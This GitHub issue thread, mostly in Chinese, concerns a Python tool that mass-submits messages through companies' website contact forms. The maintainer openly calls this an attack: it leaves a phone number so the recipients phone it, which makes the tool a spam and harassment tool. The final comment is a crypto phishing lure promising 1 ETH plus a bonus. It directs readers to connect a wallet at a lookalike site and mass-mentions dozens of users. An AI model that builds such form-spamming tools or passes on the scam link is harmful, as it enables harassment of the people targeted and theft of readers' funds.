### ISSUE TITLE
这个是错误怎么解决

### ISSUE THREAD

**Issue by yishanChan** [xxcosmos/buy_pig_plan_python#1]
Traceback (most recent call last):
  File "C:/Users/Administrator/Desktop/buy_pig_plan_python/main.py", line 62, in <module>
    main()
  File "C:/Users/Administrator/Desktop/buy_pig_plan_python/main.py", line 19, in main
    url_list = get_url_list()
  File "C:/Users/Administrator/Desktop/buy_pig_plan_python/main.py", line 57, in get_url_list
    url_list = json.load(f)
  File "C:\Users\Administrator\AppData\Local\Programs\Python\Python38-32\lib\json\__init__.py", line 293, in load
    return loads(fp.read(),
UnicodeDecodeError: 'gbk' codec can't decode byte 0xae in position 67: illegal multibyte sequence

**Comment by xxcosmos** [comment]
请尝试在main文件第56行 get_url_list 方法中加入‘rb’参数。如下：
```
with open(filepath, ’rb’) as f:
```

**Comment by yishanChan** [comment]
> 请尝试在main文件第56行 get_url_list 方法中加入‘rb’参数。如下：
> 
> ```
> with open(filepath, ’rb’) as f:
> ```

--------------TASK 1: 沈阳二一三控制电器制造有限公司 http://www.sy213.com --------------
{'status': 'error', 'message': TimeoutException('', None, None)}
--------------TASK 2: 深圳市伟之虹科技有限公司 http://www.juanding888.com/ --------------
{'status': 'error', 'message': Exception('404 Not Found')}
--------------TASK 3: 石家庄鑫脉水处理技术有限公司 http://www.xinmaiwater.com --------------
{'status': 'success'}
--------------TASK 4: 廊坊兴通生物能源科技有限公司 http://www.lfjinkai.com --------------
{'status': 'error', 'message': TimeoutException('', None, None)}
--------------TASK 5: 沈阳远洋涂装工程有限公司 http://www.024yuanyang.com --------------



请求的都失效了

**Comment by xxcosmos** [comment]
不用担心，第三个不是成功了吗😂
很多网站404无法访问了。
我测试100个网站大概成功25个。
你可以将次数调大一些，然后喝杯咖啡！

**Comment by yishanChan** [comment]
请求的路径都失效了



------------------&nbsp;原始邮件&nbsp;------------------
发件人:&nbsp;"Xiaoyuu"<notifications@github.com&gt;;
发送时间:&nbsp;2020年3月6日(星期五) 下午4:49
收件人:&nbsp;"xxcosmos/buy_pig_plan_python"<buy_pig_plan_python@noreply.github.com&gt;;
抄送:&nbsp;"1099139149"<1099139149@qq.com&gt;;"Author"<author@noreply.github.com&gt;;
主题:&nbsp;Re: [xxcosmos/buy_pig_plan_python] 这个是错误怎么解决 (#1)




请尝试在main文件第56行 get_url_list 方法中加入‘rb’参数。如下：
 with open(filepath, ’rb’) as f:

**Comment by yishanChan** [comment]
关键是成功的我也没有收到信息




------------------&nbsp;原始邮件&nbsp;------------------
发件人:&nbsp;"Xiaoyuu"<notifications@github.com&gt;;
发送时间:&nbsp;2020年3月6日(星期五) 下午5:14
收件人:&nbsp;"xxcosmos/buy_pig_plan_python"<buy_pig_plan_python@noreply.github.com&gt;;
抄送:&nbsp;"1099139149"<1099139149@qq.com&gt;;"Author"<author@noreply.github.com&gt;;
主题:&nbsp;Re: [xxcosmos/buy_pig_plan_python] 这个是错误怎么解决 (#1)




不用担心，第三个不是成功了吗😂
 很多网站404无法访问了。
 我测试100个网站大概成功25个。
 你可以将次数调大一些，然后喝杯咖啡！

**Comment by xxcosmos** [comment]
> 关键是成功的我也没有收到信息
> […](#)

本项目主要是利用网站的留言系统发起攻击，目标何时、收到何种方式的攻击取决于看到留言的人怎么处理。所以并不是实时攻击。因为我们留下了手机号，所以看到留言后一般都是电话联系。这种方式很有意思，有点余音绕梁的感觉。这种攻击全天都可以发起，而且攻击越久持续效果越好。

**Comment by josuecv26** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 100 tokens already claimed, seize this chance before it's too late!
WillDawnlll, @CyrilLD, @PaulMass, @sureandrew, @imindzzz, @calexandrepcjr, @husihan, @fuckyoukiki, @Eddyskingdom, @geket, @Yz4230, @sanisoclem, @reedhhw, @i7guokui, @durango, @koitu, @Csekker, @bluetada, @Nair4, @heiheiheiheiheihei, @wouterds, @luizferrbarbosa, @katsos, @FlamurNikolli, @COKID, @bestlzk, @Biaogo, @Kevin-Schow, @liziyi0914, @nickvellios, @crse, @patbeagan1, @jack2nb, @liugezhou, @websecureltd, @huxukai, @Tanliel, @ricardopolo, @insighthorizon, @cjim8889, @kovalensky, @matronator, @beremaran, @ColdRain-Moro, @tomakey, @onlyjob, @cliffordx, @Ubicq, @Owisky, @Surly-maid
